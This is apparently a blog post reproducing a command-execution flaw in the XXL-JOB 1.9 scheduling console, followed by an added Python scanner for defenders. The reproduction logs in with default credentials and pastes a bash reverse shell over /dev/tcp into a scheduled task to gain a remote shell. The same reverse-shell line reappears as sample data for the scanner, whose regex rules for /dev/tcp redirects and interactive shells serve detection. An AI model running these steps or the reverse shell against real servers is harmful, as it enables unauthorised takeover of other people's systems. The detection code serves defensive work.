Reproducing the XXL-JOB scheduling center background arbitrary command execution vulnerability
2022-07-30 04:32:00 【xiaochuhe.】
Warning
Do not use the content of this article to violate the law.
This article comes with no warranties.
I. Vulnerability description
In the XXL-JOB task scheduling center, an attacker who can reach the admin console (the "background") can obtain server permissions by writing shell commands into a scheduled task.
II. Affected versions
- xxl-job version 1.9
III. Vulnerability reproduction
1. Log in to the admin console with the default credentials admin/123456 and add a task.
2. Click GLUE IDE to edit the script and enter the following commands:
#!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/xxx.xxx.xxx.xxx/6666 <&1'
3. Start an nc listener on the VPS:
4. Click Execute; the shell connects back.
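For defenders, the steps above leave a clear artifact: a GLUE shell script that redirects an interactive shell to bash's /dev/tcp pseudo-device. The following is an added example, not part of the original article or of XXL-JOB: a scanner that flags such script bodies. It assumes the GLUE sources have already been exported from the scheduler's database into a job-id to script-text mapping; the function names, job ids and sample scripts are hypothetical.

```python
import re

# Rules follow the payload on this page: bash's /dev/tcp pseudo-device and an
# interactive shell (-i) whose stdio is redirected to it.
DEV_NET = re.compile(r"/dev/(?:tcp|udp)/([^/\s'\"]+)/(\d{1,5})")
INTERACTIVE = re.compile(r"\b(?:ba|z|k|da)?sh\s+(?:-\w+\s+)*-i\b")

def scan_glue_source(job_id, source):
    """Return one finding per rule hit in a GLUE shell script body."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in DEV_NET.finditer(line):
            findings.append({"job_id": job_id, "line": lineno,
                             "rule": "dev-net-redirect",
                             "dest": f"{m.group(1)}:{m.group(2)}"})
        if INTERACTIVE.search(line):
            findings.append({"job_id": job_id, "line": lineno,
                             "rule": "interactive-shell", "dest": None})
    return findings

def triage(jobs):
    """Map job id -> 'high' (both rules fire) or 'review' (one rule fires)."""
    verdicts = {}
    for job_id, source in jobs.items():
        rules = {f["rule"] for f in scan_glue_source(job_id, source)}
        if rules:
            verdicts[job_id] = "high" if len(rules) == 2 else "review"
    return verdicts

# Constructed sample data: job ids and script bodies are made up for this example.
# 203.0.113.7 and 192.0.2.20 are documentation-only addresses.
SAMPLE_JOBS = {
    1: '#!/bin/bash\necho "nightly report"\ntar -czf /tmp/report.tgz /data/report\n',
    2: "#!/bin/bash\nbash -c 'exec bash -i &>/dev/tcp/203.0.113.7/6666 <&1'\n",
    3: "#!/bin/bash\n(echo > /dev/tcp/192.0.2.20/3306) && echo db-up\n",
}

if __name__ == "__main__":
    for job_id, verdict in sorted(triage(SAMPLE_JOBS).items()):
        print(job_id, verdict, scan_glue_source(job_id, SAMPLE_JOBS[job_id]))
```

A job that only uses /dev/tcp as a port probe lands in "review" rather than "high", and the extracted destination can be checked against outbound connection logs from the executor host.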